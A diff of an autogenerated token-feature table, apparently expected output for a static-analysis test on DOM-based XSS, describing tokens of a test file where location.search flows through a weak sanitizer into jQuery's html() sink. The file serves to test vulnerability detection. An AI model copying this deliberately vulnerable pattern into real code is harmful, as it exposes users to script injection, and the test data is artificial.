| tainted2 = target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 | tainted2 = target | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 | tainted2 = target | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:7:31:23 | tainted2 = target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:18:31:23 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:18:31:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:18:31:23 | target | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:18:31:23 | target | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:31:18:31:23 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:3 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:3 | $ | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:3 | $ | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | exceptional return of $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:11 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:16 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:16 | $('myId').html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:16 | $('myId').html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:16 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | $('myId ... inted2) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | $('myId ... inted2) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | $('myId ... inted2) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | $('myId ... inted2) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | $('myId ... inted2) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | exceptional return of $('myId ... inted2) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | exceptional return of $('myId ... inted2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | exceptional return of $('myId ... inted2) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | exceptional return of $('myId ... inted2) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:3:32:26 | exceptional return of $('myId ... inted2) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:5:32:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:5:32:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:5:32:10 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14464,6 +105170,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:5:32:10 | 'myId' | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:5:32:10 | 'myId' | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:5:32:10 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:13:32:16 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:13:32:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:13:32:16 | html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:13:32:16 | html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:13:32:16 | html | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:18:32:25 | tainted2 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:18:32:25 | tainted2 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:18:32:25 | tainted2 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14471,6 +105182,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:18:32:25 | tainted2 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:18:32:25 | tainted2 | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:32:18:32:25 | tainted2 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:33:7:33:14 | sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:33:7:33:14 | sanitize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:33:7:33:14 | sanitize | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:33:7:33:14 | sanitize | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:33:7:33:14 | sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:12 | tainted2 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:12 | tainted2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:12 | tainted2 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:12 | tainted2 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:12 | tainted2 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted2 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted2 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted2 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted2 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted ... inted2) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted ... inted2) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted ... inted2) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted ... inted2) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:5:34:36 | tainted ... inted2) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:26 | sanitizeBad | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:26 | sanitizeBad | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:26 | sanitizeBad | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:26 | sanitizeBad | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:26 | sanitizeBad | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | exceptional return of sanitiz ... inted2) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | exceptional return of sanitiz ... inted2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | exceptional return of sanitiz ... inted2) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | exceptional return of sanitiz ... inted2) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | exceptional return of sanitiz ... inted2) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:28:34:35 | tainted2 | CalleeFlexibleAccessPath | sanitizeBad | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:28:34:35 | tainted2 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:28:34:35 | tainted2 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14478,6 +105224,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:28:34:35 | tainted2 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:28:34:35 | tainted2 | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:34:28:34:35 | tainted2 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | $ | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | $ | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | tainted2 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | tainted2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | tainted2 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | tainted2 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:3 | tainted2 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | exceptional return of $('myId') | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:11 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:16 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:16 | $('myId').html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:16 | $('myId').html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:16 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | $('myId ... inted2) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | $('myId ... inted2) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | $('myId ... inted2) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | $('myId ... inted2) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | $('myId ... inted2) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | exceptional return of $('myId ... inted2) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | exceptional return of $('myId ... inted2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | exceptional return of $('myId ... inted2) | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | exceptional return of $('myId ... inted2) | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:3:36:26 | exceptional return of $('myId ... inted2) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:5:36:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:5:36:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:5:36:10 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14485,6 +105266,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:5:36:10 | 'myId' | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:5:36:10 | 'myId' | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:5:36:10 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:13:36:16 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:13:36:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:13:36:16 | html | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:13:36:16 | html | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:13:36:16 | html | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:18:36:25 | tainted2 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:18:36:25 | tainted2 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:18:36:25 | tainted2 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14492,6 +105278,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:18:36:25 | tainted2 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:18:36:25 | tainted2 | enclosingFunctionName | badSanitizer | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:36:18:36:25 | tainted2 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:14 | tainted3 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:14 | tainted3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:14 | tainted3 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:14 | tainted3 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:14 | tainted3 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 = target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 = target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 = target | enclosingFunctionBody | target document location search sanitizeBad x x tainted2 target $ myId html tainted2 sanitize tainted2 sanitizeBad tainted2 $ myId html tainted2 tainted3 target $ myId html tainted3 sanitize tainted3 sanitizeBad tainted3 $ myId html tainted3 $ myId html sanitize sanitizeBad target target | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 = target | enclosingFunctionName | badSanitizer | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:38:7:38:23 | tainted3 = target | fileImports | | +| 